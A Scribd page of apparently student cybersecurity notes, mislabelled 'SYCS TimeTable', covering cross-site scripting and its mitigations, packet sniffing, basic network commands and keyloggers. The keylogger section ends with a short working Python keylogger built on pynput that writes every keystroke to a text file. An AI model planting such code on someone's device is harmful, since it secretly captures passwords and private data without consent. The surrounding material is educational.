Scribd
Upload
13 views

SYCS TimeTable

This Python code defines a keylogger that uses the pynput keyboard listening module to record all key presses. It configures logging to save keystrokes to a text file and defines an on_press function that logs the string representation of each pressed key to the file. The listener is then started to begin capturing keystrokes until interrupted.

Uploaded by

pinkuchopra17
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
13 views

SYCS TimeTable

This Python code defines a keylogger that uses the pynput keyboard listening module to record all key presses. It configures logging to save keystrokes to a text file and defines an on_press function that logs the string representation of each pressed key to the file. The listener is then started to begin capturing keystrokes until interrupted.

Uploaded by

pinkuchopra17
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

1) Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are
injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses
a web application to send malicious code, generally in the form of a browser side script, to a
different end user. Flaws that allow these attacks to succeed are quite widespread and occur
anywhere a web application uses input from a user within the output it generates without
validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s
browser has no way to know that the script should not be trusted, and will execute the script.
Because it thinks the script came from a trusted source, the malicious script can access any
cookies, session tokens, or other sensitive information retained by the browser and used with
that site. These scripts can even rewrite the content of the HTML page.
Methods to mitigate the XSS vulnerability include:
Educate app and website developers in coding best practices such as proper
HTML/JavaScript escaping/encoding techniques.
Implement code vulnerability testing at the design and development phases, and scan code in
production environments as well.
Take a zero-trust approach to user input data. Separate active browser content from
unvalidated data.
Implement a Content Security Policy that provides for appropriate website defenses against
XSS.

Sniffing attack

A sniffing attack, also known as packet sniffing or network sniffing, is a type of cybersecurity
attack where an attacker intercepts and captures network traffic passing between two or
more devices on a network. The attacker uses a packet sniffer tool to capture the data
packets transmitted over the network, and then analyzes the captured data to extract
sensitive information such as login credentials, credit card numbers, or other confidential
information.

Packet sniffers work by capturing the packets of data that are transmitted over a network,
and then reconstructing the data in a format that is readable by humans or other software.
An attacker can use packet sniffing to intercept and analyze network traffic that is not
encrypted, such as unsecured HTTP web traffic, unencrypted email messages, or FTP file
transfers.

Sniffing attacks can be carried out using both wired and wireless networks, and can be
especially effective in public Wi-Fi networks where data is often transmitted without
encryption
Wireshark is a popular open-source network protocol analyzer used for network
troubleshooting, analysis, and packet sniffing. It is available for various operating
systems, including Windows, macOS, and Linux.
*A. ipconfig:*i internet protocol configuration
Displays all current TCP/IP network configuration values and refreshes
Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS)
settings. Used without parameters, ipconfig displays Internet Protocol version 4
(IPv4) and IPv6 addresses, subnet mask, and default gateway for all adapters.

*B. Ping:*
Ping is a computer network administration software utility used to test the reachability
of a host on an Internet Protocol network. It is available for virtually all operating
systems that have networking capability, including most embedded network
administration software

*C. Netstat:*
The network statistics ( netstat ) command is a networking tool used for
troubleshooting and configuration, that can also serve as a monitoring tool for
connections over the network. Both incoming and outgoing connections, routing
tables, port listening, and usage statistics are common uses for this command.

*D. Traceroute:*
Traceroute is a network diagnostic tool used to track in real-time the pathway taken
by a packet on an IP network from source to destination, reporting the IP addresses of
all the routers it pinged in between. Traceroute also records the time taken for each
hop the packet makes during its route to the destination.

In cybersecurity, reconnaissance is the process of gathering information about a


target system or network in order to identify potential vulnerabilities or weaknesses
that could be exploited in a cyber attack. It is the first stage in the cyber attack
lifecycle,

Keylogger

A keylogger attack is a type of cybersecurity attack where an attacker installs a


malicious software program or device on a victim's computer or mobile device to
record and monitor the victim's keystrokes. The keylogger software or device
captures every key that the victim presses on their keyboard, including sensitive
information such as usernames, passwords, credit card numbers, and other
confidential data.

There are two main types of keyloggers: software-based keyloggers and


hardware-based keyloggers. Software-based keyloggers are typically installed as
malware or spyware on the victim's computer,

Hardware-based keyloggers are physical devices that are attached to the victim's
computer or keyboard to capture keystrokes.
Keylogger attacks can be very effective because they can capture information that is
not protected by encryption, such as passwords typed into a login form or sensitive
information entered into a document or email.

Keyloggers are many hackers and script kiddie’s favorite tools.


Keylogging is a method that was first imagined back in the year 1983.
Keylogger is a software that records each and every keystroke you enter, including
mouse clicks.
A keylogger can be installed on your computer any number of ways. Anyone with
access to your computer could install it; keyloggers could come as a component part
of a virus or from any application installation, despite how deceptively innocent it
may look.

Py code for keylogger

from pynput.keyboard import Key,Listener


import logging

logging.basicConfig(filename=("keylogger.txt"),level=logging.DEBUG,format="%(ascti
me)s_%(message)s")

def on_press(key):
logging.info(str(key))

with Listener(on_press=on_press) as listener:


listener.join()

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy